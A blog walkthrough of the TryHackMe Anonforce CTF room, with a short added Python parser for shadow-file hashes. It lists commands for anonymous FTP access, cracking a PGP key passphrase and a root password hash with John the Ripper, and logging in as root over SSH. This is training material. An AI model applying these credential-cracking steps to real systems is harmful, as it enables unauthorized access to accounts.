narancs's blog

TryHackMe – Anonforce walkthrough

Introduction

Logo of Anonforce CTF room

This is a walkthrough of the Anonforce CTF room on TryHackMe. It is an easy boot2root machine where we need to get access to the target through FTP.

Enumeration

I ran an nmap scan, which already revealed a lot of information to get started with.

We can see that FTP and SSH services are open on the target. FTP is not only open but accessible via anonymous user. It seems the entire root filesystem is accessible from there (except the lost+found and root directories with 700 permissions). Let’s connect to FTP and look around.

user.txt

After looking inside /home we can find the home directory of melodias that contains the user flag.

root.txt

Another interesting directory that immediately catches the eye is the one named notread in the root filesystem. If we check the files inside we can find backup.pgp and private.asc files.
ftp> ls -la
229 Entering Extended Passive Mode (|||7501|)
150 Here comes the directory listing.
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 .
drwxr-xr-x   23 0        0            4096 Aug 11  2019 ..
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
226 Directory send OK.
ftp> 

We have an encrypted backup.pgp file, and very likely a private key file that we can use to decrypt it.

First we need to import the private key into the keyring (the key management database) of our PGP application. We can do this from the command line with the following command:

gpg --import private.asc

However, we will get a popup window asking for a passphrase, because the private key is passphrase-protected.

We need to crack the passphrase in order to import the key into the keyring. We can use the John the Ripper password-cracking tool for this. For that we first need to convert the private key file into a hash using the following command:

gpg2john private.asc > privatehash.txt

Now we can run john to crack the hash using the famous rockyou.txt dictionary.

john privatehash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Now that we have the passphrase for the private key, we can import it into the keyring and decrypt the backup.pgp file.

gpg --import private.asc
gpg --decrypt backup.pgp

We will get a backup of the passwd file that includes the password hashes of the root and melodias users (although we already have the user flag from FTP). Let’s try to crack the password of root.
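As an added example (not part of the original walkthrough), here is a small Python parser for shadow-style lines like the one in that backup: it identifies the crypt scheme, the salt and the last-change date, and flags accounts whose scheme is weak or empty, which is the triage a defender would do on a leaked passwd/shadow backup. The salt and date fields of the sample mirror the root line from the box; the hash body is a constructed placeholder.

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

# crypt(3) scheme identifiers found at the start of the hash field
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
WEAK = {"empty", "descrypt", "md5crypt"}   # schemes a defender should flag for reset
EPOCH = date(1970, 1, 1)

@dataclass
class ShadowEntry:
    user: str
    scheme: Optional[str]        # None when password login is disabled (locked)
    salt: Optional[str]
    last_change: Optional[date]  # field 3 is days since the Unix epoch

def parse_shadow_line(line: str) -> ShadowEntry:
    """Parse one shadow-style line: user:hash:lastchange:min:max:warn:inactive:expire:"""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 3:
        raise ValueError(f"not a shadow entry: {line!r}")
    user, pw, last = fields[0], fields[1], fields[2]
    scheme = salt = None
    if pw.startswith(("!", "*")):
        pass                                  # locked: no password login possible
    elif pw == "":
        scheme = "empty"                      # no password required at all
    elif pw.startswith("$"):
        parts = pw.split("$")                 # ['', id, (rounds=N | cost), salt, hash]
        scheme = SCHEMES.get(parts[1], f"unknown(${parts[1]}$)")
        if scheme == "bcrypt":
            salt = parts[3][:22]              # bcrypt packs salt+hash into one field
        else:
            body = parts[2:]
            if body and body[0].startswith("rounds="):
                body = body[1:]
            salt = body[0] if body else None
    else:
        scheme, salt = "descrypt", pw[:2]     # legacy 13-char DES: first two chars are the salt
    last_change = EPOCH + timedelta(days=int(last)) if last.isdigit() else None
    return ShadowEntry(user, scheme, salt, last_change)

def needs_attention(entry: ShadowEntry) -> bool:
    """True for accounts whose hash scheme is weak or missing and should be reset."""
    return entry.scheme in WEAK

# Constructed sample: salt and date mirror the root line; the hash body is a placeholder.
SAMPLE = "root:$6$07nYFaYf$PLACEHOLDERhashbodyNOTreal:18120:0:99999:7:::"
```

Running `parse_shadow_line(SAMPLE)` reports sha512crypt with salt 07nYFaYf and a last change of 2019-08-12, matching the timestamps seen in the FTP listing.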

echo -e 'root:$6$07nYFaYf$F4VMa*** COMPLETE THE HASH HERE ***Nd2tV4uob5RVM0:18120:0:99999:7:::' > roothash.txt
john roothash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Now we can SSH to the target as root and grab the root flag.

narancs@kali:~/THM/bsidesgtanonforce$ ssh root@10.10.241.75
The authenticity of host '10.10.241.75 (10.10.241.75)' can't be established.
ED25519 key fingerprint is SHA256:+bhLW3R5qYI2SvPQsCWR9ewCoewWWvFfTVFQUAGr+ew.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:86: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.241.75' (ED25519) to the list of known hosts.
root@10.10.241.75's password: 
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-157-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ubuntu:~# cat /root/root.txt 
f7*** HIDDEN ***ce
root@ubuntu:~# 
